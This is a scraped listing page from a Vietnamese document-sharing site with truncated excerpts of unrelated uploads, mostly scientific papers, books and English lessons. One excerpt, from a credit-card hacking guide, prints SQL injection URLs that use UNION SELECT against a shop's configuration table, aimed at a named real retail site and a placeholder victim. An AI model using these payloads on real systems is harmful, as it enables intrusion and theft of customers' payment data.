2 patellotrochlear index by biedert and albrecht 19 fig 7 6

Chapter 131. Diphtheria and Other Infections Caused by Corynebacteria and Related Species (Part 7) pdf

Ngày tải lên : 08/07/2014, 02:20

... Holmes RK: Biology and molecular epidemiology of diphtheria toxin and the tox gene J Infect Dis 181(Suppl 1):S1 56, 2000 Kadirova R et al: Clinical characteristics and management of 67 6 hospitalized ... clinical features and infecting organisms Am J Med 69 :838, 198 0 [PMID: 74 465 50] Pappenheimer AM Jr, Murphy JR: Studies on the molecular epidemiology of diphtheria Lancet 2:923, 198 3 [PMID: 61 38500] ... adults Vaccine 25:3 464 , 2007; Epub 2007 Jan Meyer DK, Reboli AC: Other coryneform bacteria and Rhodococcus, in Principles and Practice of Infectious Diseases, 6th ed, GL Mandell et al (eds) Philadelphia,...

8
310
0

Pro Web 2.0 Mashups Remixing Data and Web Services phần 7 pps

Ngày tải lên : 12/08/2014, 23:21

... %2Fch13%2Fflickrgeo.php%3Fuser_id%3D4 860 01011 46% 2540N01%26tags%3D%26text%3D%26lat0%➥ 3D37.817785 166 068 %26lon0%3D-122.34375%26lat1%3D37.92 61 90 569 3 76% 26lon1%3D-122.17208 862 305➥ %26page%3D1%26per_page%3D10%26min_upload_date%3D820483200%26extras%3Dgeo%26o_format%➥ ... ch13%2Fflickrgeo.php%3Fuser_id%3D4 860 01011 46% 2540N01%26lat0%3D37.759 761 00792328% 26 lon0%3D-122.447095 568 4774%26lat1%3D37.9 564 9244418595%26lon1%3D-122.➥ 1471302328438%26page%3D1%26per_page%3D10%26min_upload_date%3D820483200%26extras%3D➥ ... '', "privacy_filter" => '', "lat0" => 37.817785 166 067 61, "lon0" => -122.34374999999999, "lat1" => 37.92 61 90 569 3 762 9, "lon1" => -122.17208 862 30 468 6, "accuracy" => '', "safe_search" => '', "content_type"...

65
345
0

Tài liệu Báo cáo khoa học: The stereochemistry of benzo[a]pyrene-2¢-deoxyguanosine adducts affects DNA methylation by SssI and HhaI DNA methyltransferases pptx

Ngày tải lên : 19/02/2014, 00:20

... 54 55 56 57 58 59 60 61 62 63 nucleotide complexes SPIE Time-Resolved Laser Spectroscopy Biochemistry III 164 0, 774–783 Roberts RJ & Cheng X (199 8) Base ﬂipping Annu Rev Biochem 67 , 181 198 Mao ... by M.SssI and M.HhaI The rates of methylation of the X+CG ⁄ CGC, GCX+ ⁄ CGC, X+CG ⁄ CGM and GCX+ ⁄ CGM duplexes by SssI and HhaI MTases were determined under steadystate conditions (Fig 4), and ... benzo[a]pyrene diol epoxide N2-dG and N6-dA lesions catalyzed by DNA bypass polymerases J Biol Chem 277, 30488–30494 Fernandes A, Liu T, Amin S, Geacintov NE, Grollman AP & Moriya M (199 8) Mutagenic potential...

14
558
0

Báo cáo khoa học: Improving thermostability and catalytic activity of pyranose 2-oxidase from Trametes multicolor by rational and semi-rational design pdf

Ngày tải lên : 07/03/2014, 03:20

... 240 ( 7193 ) 12 .6 (12.7) 99.9 (100) 17.2 (4.8) 12.1 (62 .7) 401.70 98.3 (97.4) 16. 6 597 554 19. 8 60 61 39 388 36 320 26. 6 25.4 27.8 29.8 2 564 402.10 99.1 (94 .6) 15 .6 317 871 20.4 3 262 38 65 5 ... 100 119 154 135 114 1 76 1 46 210 148 8.79 9.47 9.40 3.87 4. 26 6.01 5.77 5 .19 5.49 2.51 2. 46 2.90 2.59 1.99 2.34 2. 36 2.51 2.48 2 86 260 309 67 0 467 389 409 483 452 100 90.8 108 234 163 1 36 143 ... 103.4, 103.4, 118 .6 P42212 401.70 (1.751.70) 60 3 61 6 (49 62 4) 3.8 (3.2) 98.2 (97.4) 9.7 (2.2) 13.7 (58.8) 402.10 (2.202.10) 321 1 36 (39 548) 4.4 (3.3) 99.0 (94.0) 17.2 (6. 2) 6. 6 ( 26. 2) 511.90 (2.001.90)...

17
438
0

Báo cáo khoa học: Pherokine-2 and -3 Two Drosophila molecules related to pheromone/odor-binding proteins induced by viral and bacterial infections ppt

Ngày tải lên : 08/03/2014, 08:20

... containing two layers of caesium chloride (5% and 40%), and ultracentrifuged for 16 h at 36 000 g at 15 °C The virus band was collected and DCV was recovered by centrifugation (25 000 g, h 30 min, 15 ... and [14]) Hemolymph from DCV-injected flies was analyzed by HPLC and the molecule induced by the viral infection was detected by MALDI-TOF MS (Fig 2B) The molecule was purified to homogeneity by ... replaced by a XbaI–NheI PCR fragment containing 2 .6 kb of phk-2 5¢ untranslated sequences (GenBank AE003 462 nt2504 36 253041) to obtain pJL 265 This fragment includes exon of phk-2, the first intron, and...

10
470
0

The Eugenic Marriage, Vol 2 (of 4), by W. Grant Hague This eBook is for the use of anyone anywhere at no cost and with almost no restrictions whatsoever. You may copy it, give it away or re-use it under the terms of the Pro pptx

Ngày tải lên : 22/03/2014, 23:20

... —FOOD FORMULAS Baby's bed—The proper way to lay baby in bed—Baby should sleep by itself—How long should a baby sleep— Why a baby cries—The habitual crier— The habit of feeding baby every time it ... baby never vomits—What is the significance of socalled vomiting after feedings— Mother's milk that is unfit for baby— Fresh air for baby—Air baths for baby Page 223 CHAPTER XVIII BABY'S GOOD AND ... Medical Society, and of the American Medical Association In Four Volumes VOLUME II New York THE REVIEW OF REVIEWS COMPANY 191 4 Copyright, 191 3, by W Grant Hague Copyright, 191 4, by W Grant Hague...

634
1K
0

Báo cáo khoa học: Caspase-2 is resistant to inhibition by inhibitor of apoptosis proteins (IAPs) and can activate caspase-7 pot

Ngày tải lên : 23/03/2014, 13:20

... initiator and inﬂammatory procaspases J Biol Chem 278, 164 66 164 69 16 Colussi PA, Harvey NL, Shearwin-Whyatt LM & Kumar S (199 8) Conversion of procaspase-3 to an autoactivating caspase by fusion ... prodomain and the carboxyl-terminal regions J Biol Chem 273, 67 63 67 68 39 Harvey NL, Trapani JA, Fernandes-Alnemri T, Litwack G, Alnemri ES & Kumar S (199 6) Processing of the Nedd2 precursor by ICE-like ... cleavage by 30 lg of yeast lysate Error bars indicate standard deviations (n ¼ 3) large and small subunits (D3 16 and ⁄ or D330) permitted autocatalytic separation of the subunits (Fig 6A) and yielded...

14
348
0

báo cáo hóa học: " Prostaglandin E2 receptor subtype 2 (EP2) regulates microglial activation and associated neurotoxicity induced by aggregated α-synuclein" pptx

Ngày tải lên : 19/06/2014, 22:20

... receptor-specific prostaglandin E2 regulation of interleukin -6 generation by human HSB.2 early T cells J Pharmacol Exp Ther 199 8, 2 86( 3):1420-14 26 An S, Yang J, Xia M, Goetzl EJ: Cloning and expression ... cells were then homogenized and fractionated into cytoplasmic and membrane fractions, and the fractions Western blotted Translocation of p67-phox and p47phox was analyzed by determining changes in ... neurodegeneration J Bioenerg Biomembr 199 7, 29(2):175-183 Schapira AH: Oxidative stress and mitochondrial dysfunction in neurodegeneration Curr Opin Neurol 199 6, 9(4): 260 - 264 Layfield R, Lowe J, Bedford...

10
355
0

Báo cáo toán học: "New regular partial diﬀerence sets and strongly regular graphs with parameters (96,20,4,4) and (96,19,2,4)" ppsx

Ngày tải lên : 07/08/2014, 13:21

... Γ5 6 Γ7 Γ8 19 20 20 19 20 20 20 20 Corresp design |AutΓi | Vertex group id number D1 D1 D1 D6 D6 D6 D8 D8 92 16 11520 15 36 288 96 96 3072 138240 [64 ; 70; 71; 195 ; 227] [1 86; 190 ; 195 ; 197 ; 2 26] ... 195 ; 197 ; 2 26] [195 ; 227] [195 ; 227] [195 ] [195 ] [70; 190 ; 195 ; 227] [64 ; 70; 71; 190 ; 195 ; 227] (2.1) Six graphs are with parameters ( 96, 20,4,4) and two with parameters ( 96 ,19, 2,4) Two of the ... and ∆[ 96 ,195 ],4 xy \ {e} are isomorphic to Γ1 ; ∆[ 96 ,195 ],1 \ {e} and 6 [ 96 ,195 ],2 \ {e} are isomorphic to Γ4 the electronic journal of combinatorics 13 (20 06) , #R88 7 In the group: H[ 96 ,197 ]...

10
383
0

Báo cáo y học: " Caveolin-1 and -2 in airway epithelium: expression and in situ association as detected by FRET-CLSM" pps

Ngày tải lên : 12/08/2014, 16:20

... length (bp) Position of amplified DNA (bp) cav-1 Z 466 14.1 123 25–147 cav-1 Z 466 14.1 121 165 –285 cav-2 BC 062 059.1 1 06 392–497 cav-2 BC 062 059.1 127 1 76 302 β-MG NM_012512 Forward: CAGCATGTCTGGGGGTAAAT ... expression of cav-1 and cav-2 on the mRNA and protein level, determined the distribution of cav-1α, cav-1β, and cav-2 by immunohistochemistry and examined the presence of caveolae by electron microscopy ... epithelial cells (Figure 2A) A band of 22 kD and a band of 18 kD, corresponding to cav-1β, were detected in abraded tracheal epithelial cells using an anti-cav-1αβ antibody (Figure 2B) Bands of the...

13
293
0

The chart below shows the amount of leisure time enjoyed by men and women of different employment status

Ngày tải lên : 04/10/2012, 10:02

1
2.8K
10

English for Tourism and Hospitality 19

Ngày tải lên : 05/11/2012, 09:52

... convict in the early 1800s He 4) and lived in the Australian 5) _ with the 6) 7) for 32 years 8) _ 1835, he left the 9) _ and told the 10) his story ... gate Suggested Answers: 1) hers 2) mine 3) ours 4) his 5) yours 6) theirs 1) legend 2) police 3) Australia 4) escaped 5) bush 6) Aboriginal 7) people 8) In 9) bush 10) police An Australian 1) ... coat, so he gave her Are these ? I found them outside your room I gave them my brochure and they gave me _ Reading – An Australian legend Choose a word from the box to complete the...

2
651
13

English for Tourism and Hospitality 19

Ngày tải lên : 05/11/2012, 16:27

... Học 19: Lễ Rước Đèn Lesson 19: At the Festival Mời bạn tiếp tục theo dõi đối thoại Jack: So the festival happens on the full moon? Leo: Yes It's a time for families to get together Mona: And ... trưng cho tuổi thọ Leo: And yours is a crab, Jack Đèn ông có hình cua, ông Jack Leo: It's said to be the symbol of the emperor Người ta bảo rằng, biểu tượng vua chúa Mona: And what's yours, Leo? ... butterfly Mona: Oh, it's pretty Leo: It represents longevity… and yours is a crab, Jack It's said to be the symbol of the emperor Mona: And what's yours, Leo? Leo: Mine's a lobster A symbol of fun...

7
416
1

Comparative decolorizing efficiency of textile dye by mesophilic and thermophilic anaerobic treatments

Ngày tải lên : 05/09/2013, 09:38

... 36 Hour (s) 48 RB4(55°C) 60 72 Figure - Decolorizing efficiencies of RB4 under 35OC (■) and 55OC (□) 300 350 400 450 500 Wavelength 550 60 0 65 0 Figure - Wavelength scanning of untreated (■) and ... condition (35OC) Control - 254 .67 220.29 19. 35 46. 36 72.32 4.8 1.22 13.41 MO 98.73 298.79 289.31 3.71 7.57 52.17 1 .6 3.22 14.73 RB4 73.72 3 36. 74 115.70 10.22 151. 96 73.15 0 .67 2.40 15.43 O Thermophilic ... condition (55 C) Control - 240.44 17.77 7. 56 70. 56 3.72 12.48 2 .64 MO 98.48 109.44 47. 76 2.72 3.47 46. 25 0.7 8.42 0.18 RB4 83.82 192 .28 28. 56 9.54 33.14 63 .43 0.48 1.31 3.57 nd th * CH4 production...

10
405
0

Salts Transport in Alkali Soil Reclamation by Gypsum and Prediction of Na Leaching in Field in China

Ngày tải lên : 05/09/2013, 09:38

... Italy Monteith J.L (1 96 5) Evaporation and the environtment, Symp Soc Exp Biol 19, 205-234 - 132 - Journal of Water and Environment Technology, Vol 7, No 2, 2009 Philip J.R (1 96 6) Plant water relations: ... Change, 68 , 169 -197 Tian Y., Li F and Liu P (2003) Economic analysis of rainwater harvesting and irrigation methods, with an example from China Agr Water Manage., 60 , 217-2 26 Thornthwaite C.W (194 8) ... evapotranspiration by empirical formulae include the Thornthwaite method (Thornthwaite, 194 8), the Blaney-Criddle method (Blaney and Criddle, 195 0), the Makkink method (Makkink, 195 7), and the Priestley and...

13
428
0

Impact of pH on Anaerobic Substrate Uptake by PAOs and GAOs in an EBPR Activated Sludge Process Analyzed by MAR-FISH

Ngày tải lên : 05/09/2013, 09:38

... the method described by Andreasen and Nielsen (199 7) and Lee et al (199 9) The cover slip was immersed in Hypercoat Emulsion LM1(Amersham Bioscience Inc.) at 43oC for sec, and dried The cover slip ... between and or The effect of pH on the anaerobic uptake of radio-labeled acetate by Candidatus ‘Accumulibacter phosphatis’ and Candidatus ‘Competibacter phosphatis’ was examined by MAR-FISH, and ... Journal of Water and Environment Technology, Vol 7, No 4, 2009 study of substrate uptake by filamentous microorganisms in activated sludge Appl Environ Microbiol., 63 , 366 2- 366 8 Bond, P L.; Keller,...

9
457
0

Control of Membrane Fouling by Coagulant and Coagulant Aid Addition in Membrane Bioreactor Systems

Ngày tải lên : 05/09/2013, 10:15

... Glucose 1233.33 BOD 1000 Sodium L(+)-glutamate 60 3.33 Nitrogen 50 monohydrate Phosphorus 25 NaCl 16. 67 CaCl2.2H2O 11 MgSO4 10.5 K2HPO4 1 06. 67 KH2PO4 26. 67 NaHCO3 105 205 Mixed liquor taken from an ... protein and carbohydrate removals by PSI-025 (45 mg Fe/L and 12 mg Si/L) and PSI-100 (45 mg Fe/L and 49.5 mg Si/L) additions The standard deviations were calculated from samples Protein and carbohydrate ... 19, 67 8 -68 8 Ichihashi O., Satoh H., and Mino T (20 06) Effect of soluble microbial products on microbial metabolisms related to nutrient removal, Water Research, 40, 162 7 – 163 3 Jarusutthirak C and...

11
575
0

Hacking Credit Card Version 2.0 - Written by Hieupc

Ngày tải lên : 09/10/2013, 12:20

... http://www.valuevision.com.ph/shopdisplayproducts.asp?cat='%20union%20%20select% 201,2,3,4,5 ,6, 7,8,9,10,11,12,13,14,15, 16, 17,18 ,19, 20,21,22,23,24,25, 26, 27,28,29,30,31,32,33,34,35, 36, 37,38,39,40,41, 42,43,44,45, 46, 47%20from%20configuration"having%201=1 sp_password ... '%20union%20%20select%201,2,3, fieldvalue,5 ,6, 7,8,9,10,11,12,13,14,15, 16, 17,18 ,19, 20,21,22,23,24,25, 26, 27,28,29,30,31,32,33,34,35, 36, 37,38,39,40,41 ,42,43,44,45, 46, 47%20from%20configuration"having%201=1 sp_password ... http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3, fieldvalue,5 ,6, 7,8,9,10,11,12,13,14,15, 16, 17,18 ,19, 20,21,22,23,24,25, 26, 27,28,29,30,31,32,33,34,35, 36, 37,38,39,40,41 ,42,43,44,45, 46, 47%20from%20configuration"having%201=1 sp_password...

5
1.2K
34

Lab 9.2.6 Troubleshooting Using Ping and Telnet

Ngày tải lên : 19/10/2013, 02:15

... Step Configure the routers a On the routers, enter the global configuration mode and configure the hostname as shown in the chart Then configure the console, virtual terminal, and enable passwords ... the Configuring Router Passwords lab Next configure the interfaces and routing according to the chart If there are problems doing this, refer to the Configuring Host Tables lab and the Configuring ... running-config to the startup-config on each router, so the configuration will not be lost if the router is power recycled Step Configure the hosts with the proper IP address, subnet mask and default...

4
467
0

UNIT 9: BY LAND AND BY SEA

Ngày tải lên : 24/10/2013, 00:15

... 11 hitchhike /’hItS,haIk/ verb [intransitive] to travel by asking other people to take you in their car, by standing on the side of a road and holding out your thumb or a sign: giang xe You should ... chụp hình I’ll stand over here, and you can take the picture 22 get lost: not knowing where you are or how to get to where you want to go: bị lạc They decided to drive to New York and ended up getting ... hotel 26 aisle /aIl/ noun [count] a passage between rows of seats, for example in a church, theater, or airplane, or between the shelves of a supermarket: lối hai hàng ghế 27 hand luggage /hAnd...

7
528
1